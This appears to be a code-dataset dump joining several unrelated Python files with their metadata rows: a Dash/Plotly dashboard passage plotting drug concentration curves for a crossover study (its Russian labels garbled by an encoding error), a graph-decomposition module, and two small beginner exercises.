                fig.add_trace(go.Scatter(x=[time[np.argmin(df_r.loc[
                    yaxis_column_name_conc_tr])]], y = [min(df_r.loc[
                    yaxis_column_name_conc_tr])], mode='markers', name='ะะธะฝะธะผัะผ R',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_tr,
                                 type=yaxis_type_conc_tr)
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_tr', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_tr', 'value'),
                               dash.dependencies.Input('yaxis_type_conc_tr', 'value')])(update_graph)
            available_indicators = df_t.index
            return html.Div([html.Div(html.H1(children='ะะฝะดะธะฒะธะดัะฐะปัะฝัะต ะณัะฐัะธะบะธ ะบะพะฝัะตะฝััะฐัะธะธ ะดะปั ะฟะฐัะธะตะฝัะพะฒ ะณััะฟะฟะฐ TR'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_tr',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                     html.Div([dcc.RadioItems(
                                         id='yaxis_type_conc_tr',
                                         options=[{'label': i, 'value': i}
                                                  for i in ['linear', 'log']],
                                         value='linear'
                                     )], style={'width': '48%', 'float': 'right', 'display': 'inline-block'})
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_tr')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_concentration_time_cross_tr),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
        else:
            df_t = self.settings[0].concentration_t_2
            df_r = self.settings[0].concentration_r_2
            # Time points are taken from the T matrix; the R matrix is
            # assumed to share the same sampling grid.
            time = df_t.columns
            def update_graph(yaxis_column_name_conc_rt, yaxis_type_conc_rt):
                # Rebuild both curves for the selected subject.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df_t.loc[
                    yaxis_column_name_conc_rt], name='T'))
                fig.add_trace(go.Scatter(x=time, y=df_r.loc[
                    yaxis_column_name_conc_rt], name='R'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_t.loc[
                    yaxis_column_name_conc_rt])]], y = [max(df_t.loc[
                    yaxis_column_name_conc_rt])], mode='markers', name='ะะฐะบัะธะผัะผ T',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df_t.loc[
                    yaxis_column_name_conc_rt])]], y = [min(df_t.loc[
                    yaxis_column_name_conc_rt])], mode='markers', name='ะะธะฝะธะผัะผ T',
                    marker=dict(size = 15, color = 'green')))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_r.loc[
                    yaxis_column_name_conc_rt])]], y = [max(df_r.loc[
                    yaxis_column_name_conc_rt])], mode='markers', name='ะะฐะบัะธะผัะผ R',
                    marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df_r.loc[
                    yaxis_column_name_conc_rt])]], y = [min(df_r.loc[
                    yaxis_column_name_conc_rt])], mode='markers', name='ะะธะฝะธะผัะผ R',
                    marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(title=yaxis_column_name_conc_rt,
                                 type=yaxis_type_conc_rt)
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_rt', 'figure'),
                              [dash.dependencies.Input('yaxis_column_name_conc_rt', 'value'),
                               dash.dependencies.Input('yaxis_type_conc_rt', 'value')])(update_graph)
            available_indicators = df_t.index
            return html.Div([html.Div(html.H1(children='ะะฝะดะธะฒะธะดัะฐะปัะฝัะต ะณัะฐัะธะบะธ ะบะพะฝัะตะฝััะฐัะธะธ ะดะปั ะฟะฐัะธะตะฝัะพะฒ ะณััะฟะฟะฐ RT'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([
                                     html.Div([
                                         dcc.Markdown(
                                             children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
                                         dcc.Dropdown(
                                             id='yaxis_column_name_conc_rt',
                                             options=[{'label': i, 'value': i}
                                                      for i in available_indicators],
                                             value=available_indicators[0]
                                         )
                                     ], style={'width': '48%', 'display': 'inline-block'}),
                                     html.Div([dcc.RadioItems(
                                         id='yaxis_type_conc_rt',
                                         options=[{'label': i, 'value': i}
                                                  for i in ['linear', 'log']],
                                         value='linear'
                                     )], style={'width': '48%', 'float': 'right', 'display': 'inline-block'})
                                 ], style={'padding': '5px'}),
                                 dcc.Graph(id='concentration_time_rt')], style={'width': '78%',
                                 'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_concentration_time_cross_rt),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
    def _generate_concentration_time_mean(self):
        """Dash layout section: static plot of mean concentration vs time
        for both drug groups (linear y-axis).

        The mean is taken over subjects at each time point; extremes of both
        mean curves are marked. No callback is registered — the figure is
        built once and embedded directly in the Graph component.
        """
        df_r = self.settings[0].concentration_r.mean()
        df_t = self.settings[0].concentration_t.mean()
        # After .mean() the Series index is the sampling time points.
        time = df_t.index
        fig = go.Figure()
        fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
        fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
        fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
                                 marker=dict(size = 15, color = 'violet')))
        fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
                                 marker=dict(size = 15, color = 'green')))
        fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
                                 marker=dict(size = 15, color = 'violet')))
        fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
                                 marker=dict(size = 15, color = 'green')))
        fig.update_xaxes(title='ะัะตะผั')
        fig.update_yaxes(title='ะะพะฝัะตะฝััะฐัะธั',
                         type='linear')
        return html.Div([html.Div(html.H1(children='ะะฑะพะฑัะตะฝะฝัะน ะณัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ'),
                                  style={'text-align': 'center'}),
                         html.Div([
                             dcc.Graph(id='concentration_time_mean', figure=fig)],
                             style={'width': '78%', 'display': 'inline-block',
                                    'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                         html.Div(dcc.Markdown(children=markdown_text_conc_time_mean),
                                  style={'width': '18%', 'float': 'right', 'display': 'inline-block'})], style={'margin': '100px'}
                        )
    def _generate_concentration_time_log_mean(self):
        """Dash layout section: static plot of mean concentration vs time
        for both drug groups with a logarithmic y-axis.

        Same construction as ``_generate_concentration_time_mean`` but with
        ``type='log'`` on the y-axis and a different Graph id / help text.
        """
        df_r = self.settings[0].concentration_r.mean()
        df_t = self.settings[0].concentration_t.mean()
        # After .mean() the Series index is the sampling time points.
        time = df_t.index
        fig = go.Figure()
        fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
        fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
        fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
                                 marker=dict(size = 15, color = 'violet')))
        fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
                                 marker=dict(size = 15, color = 'green')))
        fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
                                 marker=dict(size = 15, color = 'violet')))
        fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
                                 marker=dict(size = 15, color = 'green')))
        fig.update_xaxes(title='ะัะตะผั')
        fig.update_yaxes(title='ะะพะฝัะตะฝััะฐัะธั',
                         type='log')
        return html.Div([html.Div(html.H1(
            children='ะะฑะพะฑัะตะฝะฝัะน ะณัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะฟัะพะปะพะณะฐัะธัะผะธัะพะฒะฐะฝะฝะพะน ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ'),
            style={'text-align': 'center'}),
                         html.Div([
                             dcc.Graph(id='concentration_time_r_log_mean', figure=fig)],
                             style={'width': '78%', 'display': 'inline-block',
                                    'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                         html.Div(dcc.Markdown(children=markdown_text_conc_time_log_mean),
                                  style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                        style={'margin': '100px'}
                        )
    def _generate_concentration_time_linlog_mean(self):
        """Dash layout section: mean concentration vs time for both groups
        with a user-selectable linear/log y-axis.

        Side effect: registers a callback on ``self.app`` keyed to the
        axis-type RadioItems; the mean curves themselves are computed once
        here and captured by the callback closure.
        """
        df_r = self.settings[0].concentration_r.mean()
        df_t = self.settings[0].concentration_t.mean()
        # After .mean() the Series index is the sampling time points.
        time = df_t.index
        def update_graph(yaxis_type_conc_linlog_mean):
            # Redraw with the requested y-axis type.
            fig = go.Figure()
            fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
            fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
            fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
                                     marker=dict(size = 15, color = 'violet')))
            fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
                                     marker=dict(size = 15, color = 'green')))
            fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
                                     marker=dict(size = 15, color = 'violet')))
            fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
                                     marker=dict(size = 15, color = 'green')))
            fig.update_xaxes(title='ะัะตะผั')
            fig.update_yaxes(title='ะะพะฝัะตะฝััะฐัะธั',
                             type=yaxis_type_conc_linlog_mean)
            return fig
        self.app.callback(dash.dependencies.Output('concentration_time_linlog_mean', 'figure'),
                          [dash.dependencies.Input('yaxis_type_conc_linlog_mean', 'value')])(update_graph)
        return html.Div([html.Div(html.H1(children='ะะฑะพะฑัะตะฝะฝัะน ะณัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ'),
                                  style={'text-align': 'center'}),
                         html.Div([
                             html.Div([
                                 html.Div([dcc.RadioItems(
                                     id='yaxis_type_conc_linlog_mean',
                                     options=[{'label': i, 'value': i}
                                              for i in ['linear', 'log']],
                                     value='linear'
                                 )], style={'width': '48%', 'display': 'inline-block'})
                             ], style={'padding': '5px'}),
                             dcc.Graph(id='concentration_time_linlog_mean')],
                             style={'width': '78%', 'display': 'inline-block',
                                    'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                         html.Div(dcc.Markdown(children=markdown_text_conc_time_mean),
                                  style={'width': '18%', 'float': 'right', 'display': 'inline-block'})], style={'margin': '100px'}
                        )
    def _generate_group_mean(self, tr=True):
        """Dash layout section: mean concentration vs time within one
        crossover sequence group, test and reference curves overlaid.

        tr=True -> sequence TR (``concentration_*_1``), tr=False ->
        sequence RT (``concentration_*_2``). The y-axis type is chosen by
        RadioItems; extremes of both mean curves are marked.

        Side effect: registers the axis-type callback on ``self.app``.
        """
        if tr:
            df_t = self.settings[0].concentration_t_1.mean()
            df_r = self.settings[0].concentration_r_1.mean()
            # After .mean() the Series index is the sampling time points.
            time = df_t.index
            def update_graph(group_mean_type_tr):
                # Redraw with the requested y-axis type.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
                fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
                                         marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
                                         marker=dict(size = 15, color = 'green')))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
                                         marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
                                         marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(type=group_mean_type_tr, title='ะะพะฝัะตะฝััะฐัะธั')
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_tr_mean', 'figure'),
                              dash.dependencies.Input('group_mean_type_tr', 'value'))(update_graph)
            return html.Div([html.Div(html.H1(children='ะกัะตะดะฝัั ะบะพะฝัะตะฝััะฐัะธั ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ TR'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([dcc.RadioItems(
                                     id='group_mean_type_tr',
                                     options=[{'label': i, 'value': i}
                                              for i in ['linear', 'log']],
                                     value='linear'
                                 )], style={'width': '48%', 'display': 'inline-block'}),
                                 dcc.Graph(id='concentration_time_tr_mean')],
                                 style={'width': '78%', 'display': 'inline-block',
                                        'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_group_mean_tr),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
        else:
            df_t = self.settings[0].concentration_t_2.mean()
            df_r = self.settings[0].concentration_r_2.mean()
            # After .mean() the Series index is the sampling time points.
            time = df_t.index
            def update_graph(group_mean_type_rt):
                # Redraw with the requested y-axis type.
                fig = go.Figure()
                fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
                fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
                                         marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
                                         marker=dict(size = 15, color = 'green')))
                fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
                                         marker=dict(size = 15, color = 'violet')))
                fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
                                         marker=dict(size = 15, color = 'green')))
                fig.update_xaxes(title='ะัะตะผั')
                fig.update_yaxes(type=group_mean_type_rt, title='ะะพะฝัะตะฝััะฐัะธั')
                return fig
            self.app.callback(dash.dependencies.Output('concentration_time_rt_mean', 'figure'),
                              dash.dependencies.Input('group_mean_type_rt', 'value'))(update_graph)
            return html.Div([html.Div(html.H1(children='ะกัะตะดะฝัั ะบะพะฝัะตะฝััะฐัะธั ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ RT'),
                                      style={'text-align': 'center'}),
                             html.Div([
                                 html.Div([dcc.RadioItems(
                                     id='group_mean_type_rt',
                                     options=[{'label': i, 'value': i}
                                              for i in ['linear', 'log']],
                                     value='linear'
                                 )], style={'width': '48%', 'display': 'inline-block'}),
                                 dcc.Graph(id='concentration_time_rt_mean')],
                                 style={'width': '78%', 'display': 'inline-block',
                                        'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                             html.Div(dcc.Markdown(children=markdown_group_mean_rt),
                                      style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                            style={'margin': '100px'}
                            )
    def _generate_drug_mean(self):
        """Dash layout section: pooled mean concentration per drug across
        both crossover sequences.

        For each drug the curve is the plain average of the two
        sequence-group means, ``(mean_1 + mean_2) / 2``. The y-axis type is
        chosen by RadioItems; extremes of both pooled curves are marked.

        Side effect: registers the axis-type callback on ``self.app``.

        NOTE(review): averaging the two group means equally weights the
        groups regardless of their sizes — confirm groups are balanced.
        """
        df_t_1 = self.settings[0].concentration_t_1.mean()
        df_t_2 = self.settings[0].concentration_t_2.mean()
        df_r_1 = self.settings[0].concentration_r_1.mean()
        df_r_2 = self.settings[0].concentration_r_2.mean()
        # After .mean() the Series index is the sampling time points.
        time = df_t_1.index
        def update_graph(drug_mean_type):
            # Redraw with the requested y-axis type.
            fig = go.Figure()
            fig.add_trace(go.Scatter(x=time, y=(
                df_t_1 + df_t_2) / 2, name='T'))
            fig.add_trace(go.Scatter(x=time, y=(
                df_r_1 + df_r_2) / 2, name='R'))
            fig.add_trace(go.Scatter(x=[time[np.argmax((df_t_1 + df_t_2) / 2)]], y = [max((df_t_1 + df_t_2) / 2)],
                                     mode='markers', name='ะะฐะบัะธะผัะผ T',
                                     marker=dict(size = 15, color = 'violet')))
            fig.add_trace(go.Scatter(x=[time[np.argmin((df_t_1 + df_t_2) / 2)]], y = [min((df_t_1 + df_t_2) / 2)],
                                     mode='markers', name='ะะธะฝะธะผัะผ T',
                                     marker=dict(size = 15, color = 'green')))
            fig.add_trace(go.Scatter(x=[time[np.argmax((df_r_1 + df_r_2) / 2)]], y = [max((df_r_1 + df_r_2) / 2)], mode='markers', name='ะะฐะบัะธะผัะผ R',
                                     marker=dict(size = 15, color = 'violet')))
            fig.add_trace(go.Scatter(x=[time[np.argmin((df_r_1 + df_r_2) / 2)]], y = [min((df_r_1 + df_r_2) / 2)], mode='markers', name='ะะธะฝะธะผัะผ R',
                                     marker=dict(size = 15, color = 'green')))
            fig.update_xaxes(title='ะัะตะผั')
            fig.update_yaxes(type=drug_mean_type, title='ะะพะฝัะตะฝััะฐัะธั')
            return fig
        self.app.callback(dash.dependencies.Output('drug_mean', 'figure'),
                          dash.dependencies.Input('drug_mean_type', 'value'))(update_graph)
        return html.Div([html.Div(html.H1(children='ะะฑะพะฑัะตะฝะฝัะต ะดะฐะฝะฝัะต ะฟะพ ะดะฒัะผ ะฟัะตะฟะฐัะฐัะฐะผ'),
                                  style={'text-align': 'center'}),
                         html.Div([html.Div([dcc.RadioItems(
                             id='drug_mean_type',
                             options=[{'label': i, 'value': i}
                                      for i in ['linear', 'log']],
                             value='linear'
                         )], style={'width': '48%', 'display': 'inline-block'}),
                             dcc.Graph(id='drug_mean')],
                             style={'width': '78%', 'display': 'inline-block',
                                    'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
                         html.Div(dcc.Markdown(children=markdown_drug_mean),
                                  style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
                        style={'margin': '100px'}
                        )
| 62.222222
| 153
| 0.444626
| 6,043
| 61,040
| 4.303492
| 0.048982
| 0.031762
| 0.053488
| 0.059909
| 0.934054
| 0.916712
| 0.883142
| 0.869684
| 0.841537
| 0.810505
| 0
| 0.02377
| 0.417611
| 61,040
| 980
| 154
| 62.285714
| 0.707784
| 0.000688
| 0
| 0.622517
| 0
| 0
| 0.161584
| 0.017804
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030905
| false
| 0
| 0.012141
| 0.001104
| 0.081678
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
02560728918e83670ec8d88d9fd19f62ed3cbdeb
| 4,577
|
py
|
Python
|
ego/decomposition/positive_and_negative.py
|
fabriziocosta/EGO
|
d89e88183cce1ff24dca9333c09fa11597a45c7a
|
[
"MIT"
] | null | null | null |
ego/decomposition/positive_and_negative.py
|
fabriziocosta/EGO
|
d89e88183cce1ff24dca9333c09fa11597a45c7a
|
[
"MIT"
] | null | null | null |
ego/decomposition/positive_and_negative.py
|
fabriziocosta/EGO
|
d89e88183cce1ff24dca9333c09fa11597a45c7a
|
[
"MIT"
] | 1
|
2022-01-24T09:53:20.000Z
|
2022-01-24T09:53:20.000Z
|
#!/usr/bin/env python
"""Provides scikit interface."""
from toolz import curry
import numpy as np
from ego.component import GraphComponent, serialize, get_subgraphs_from_node_components
@curry
def positive_and_negative(graph, ktop=0, part_importance_estimator=None):
    """Split *graph*'s fragments into the ktop most and least important node sets.

    Fragments are scored via ``part_importance_estimator.importance_dict``
    (codes missing from the dict score 0). Returns a pair of lists of node
    sets: ``(positive_components, negative_components)`` for the ktop
    highest- and lowest-scoring fragments respectively.
    """
    codes, fragments = part_importance_estimator.encoding_func(graph)
    scores = [part_importance_estimator.importance_dict.get(code, 0) for code in codes]
    # Clamp ktop so the two slices can never cover the whole fragment list.
    if ktop > len(scores) - 1:
        ktop = len(scores) - 1
    if ktop <= 0:
        # BUG FIX: ids[-0:] slices the WHOLE list, so ktop=0 previously
        # returned every fragment as "positive" while "negative" was
        # (correctly) empty. Return a symmetric empty result instead.
        return [], []
    ids = np.argsort(scores)
    # 'idx' instead of 'id' — the original shadowed the builtin.
    positive_components = [set(fragments[idx].nodes()) for idx in ids[-ktop:]]
    negative_components = [set(fragments[idx].nodes()) for idx in ids[:ktop]]
    return positive_components, negative_components
@curry
def positive_decomposition(graph, ktop=0, part_importance_estimator=None):
    """Return only the positive (highest-importance) node components of *graph*."""
    positive, _negative = positive_and_negative(
        graph,
        ktop=ktop,
        part_importance_estimator=part_importance_estimator)
    return positive
@curry
def negative_decomposition(graph, ktop=0, part_importance_estimator=None):
    """Return only the negative (lowest-importance) node components of *graph*."""
    _positive, negative = positive_and_negative(
        graph,
        ktop=ktop,
        part_importance_estimator=part_importance_estimator)
    return negative
@curry
def positive_and_negative_decomposition(graph, ktop=0, part_importance_estimator=None):
    """Return the positive components followed by the negative ones as one list."""
    positive, negative = positive_and_negative(
        graph,
        ktop=ktop,
        part_importance_estimator=part_importance_estimator)
    return positive + negative
@curry
def decompose_positive(graph_component, ktop=0, part_importance_estimator=None):
    """Decompose every subgraph of *graph_component* into its positive
    components, tagging each resulting signature with 'positive' and ktop.
    Returns a new GraphComponent over the same underlying graph."""
    collected_subgraphs = []
    collected_signatures = []
    for subgraph, signature in zip(graph_component.subgraphs, graph_component.signatures):
        components = positive_decomposition(
            subgraph, ktop=ktop, part_importance_estimator=part_importance_estimator)
        subgraphs = get_subgraphs_from_node_components(
            graph_component.graph, components)
        # One shared tagged signature per source subgraph, replicated per result.
        tagged = serialize(['positive',
                            ktop], signature)
        collected_subgraphs.extend(subgraphs)
        collected_signatures.extend([tagged] * len(subgraphs))
    return GraphComponent(
        graph=graph_component.graph,
        subgraphs=collected_subgraphs,
        signatures=collected_signatures)
@curry
def decompose_negative(graph_component, ktop=0, part_importance_estimator=None):
    """Decompose every subgraph of *graph_component* into its negative
    components, tagging each resulting signature with 'negative' and ktop.
    Returns a new GraphComponent over the same underlying graph."""
    collected_subgraphs = []
    collected_signatures = []
    for subgraph, signature in zip(graph_component.subgraphs, graph_component.signatures):
        components = negative_decomposition(
            subgraph, ktop=ktop, part_importance_estimator=part_importance_estimator)
        subgraphs = get_subgraphs_from_node_components(
            graph_component.graph, components)
        # One shared tagged signature per source subgraph, replicated per result.
        tagged = serialize(['negative',
                            ktop], signature)
        collected_subgraphs.extend(subgraphs)
        collected_signatures.extend([tagged] * len(subgraphs))
    return GraphComponent(
        graph=graph_component.graph,
        subgraphs=collected_subgraphs,
        signatures=collected_signatures)
@curry
def decompose_positive_and_negative(graph_component, ktop=0, part_importance_estimator=None):
    """Decompose every subgraph of *graph_component* into both positive and
    negative components, tagging each resulting signature with
    'positive_and_negative' and ktop. Returns a new GraphComponent."""
    collected_subgraphs = []
    collected_signatures = []
    for subgraph, signature in zip(graph_component.subgraphs, graph_component.signatures):
        components = positive_and_negative_decomposition(
            subgraph, ktop=ktop, part_importance_estimator=part_importance_estimator)
        subgraphs = get_subgraphs_from_node_components(
            graph_component.graph, components)
        # One shared tagged signature per source subgraph, replicated per result.
        tagged = serialize(['positive_and_negative',
                            ktop], signature)
        collected_subgraphs.extend(subgraphs)
        collected_signatures.extend([tagged] * len(subgraphs))
    return GraphComponent(
        graph=graph_component.graph,
        subgraphs=collected_subgraphs,
        signatures=collected_signatures)
def pst(*args, **kwargs):
    """Shorthand alias for :func:`decompose_positive`."""
    return decompose_positive(*args, **kwargs)
def ngt(*args, **kwargs):
    """Shorthand alias for :func:`decompose_negative`."""
    return decompose_negative(*args, **kwargs)
def pstngt(*args, **kwargs):
    """Shorthand alias for :func:`decompose_positive_and_negative`."""
    return decompose_positive_and_negative(*args, **kwargs)
| 36.616
| 93
| 0.719685
| 509
| 4,577
| 6.125737
| 0.129666
| 0.094291
| 0.154907
| 0.042656
| 0.842207
| 0.801796
| 0.780629
| 0.768762
| 0.768762
| 0.768762
| 0
| 0.00274
| 0.202753
| 4,577
| 125
| 94
| 36.616
| 0.85174
| 0.010269
| 0
| 0.67
| 0
| 0
| 0.008177
| 0.004641
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.18
| 0.03
| 0.38
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
026a64c83a37bffdbf432fe20a0716dd9d09fa5a
| 189
|
py
|
Python
|
generators_comprehension/list_comphresension/listcomp.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
generators_comprehension/list_comphresension/listcomp.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
generators_comprehension/list_comphresension/listcomp.py
|
kumarvgit/python3
|
318c5e7503fafc9c60082fa123e2930bd82a4ec9
|
[
"MIT"
] | null | null | null |
print(__file__)

numbers = range(1, 6)

# Build the list of squares of 1..5 with a list comprehension.
squares = [n ** 2 for n in numbers]

# The set-comprehension variant would be: {n ** 2 for n in numbers}
print(squares)
| 21
| 47
| 0.719577
| 26
| 189
| 5.076923
| 0.538462
| 0.30303
| 0.393939
| 0.409091
| 0.681818
| 0.681818
| 0.681818
| 0.681818
| 0
| 0
| 0
| 0.025478
| 0.169312
| 189
| 8
| 48
| 23.625
| 0.815287
| 0.433862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
65fc696191700ab451569faf82b46c35dee280f4
| 111
|
py
|
Python
|
Python exercicios/operador.py
|
andrelopes1977/python-exercicios
|
06f9b5aa0defeda3030a861a0a9f16b4769bc810
|
[
"MIT"
] | null | null | null |
Python exercicios/operador.py
|
andrelopes1977/python-exercicios
|
06f9b5aa0defeda3030a861a0a9f16b4769bc810
|
[
"MIT"
] | null | null | null |
Python exercicios/operador.py
|
andrelopes1977/python-exercicios
|
06f9b5aa0defeda3030a861a0a9f16b4769bc810
|
[
"MIT"
] | null | null | null |
x = 2
y = 3
z = 4

# Print each comparison / boolean expression result, one per line
# (identical output to printing the expressions inline).
for result in (x == y, x > y, x < y, x == y and x == z, x == y or x == z):
    print(result)
| 8.538462
| 24
| 0.45045
| 27
| 111
| 1.851852
| 0.333333
| 0.6
| 0.7
| 0.72
| 0.56
| 0.56
| 0.56
| 0.56
| 0.56
| 0
| 0
| 0.04
| 0.324324
| 111
| 13
| 25
| 8.538462
| 0.626667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5a1de765415938b1b2c2997c6378db19f6ed4d5e
| 698
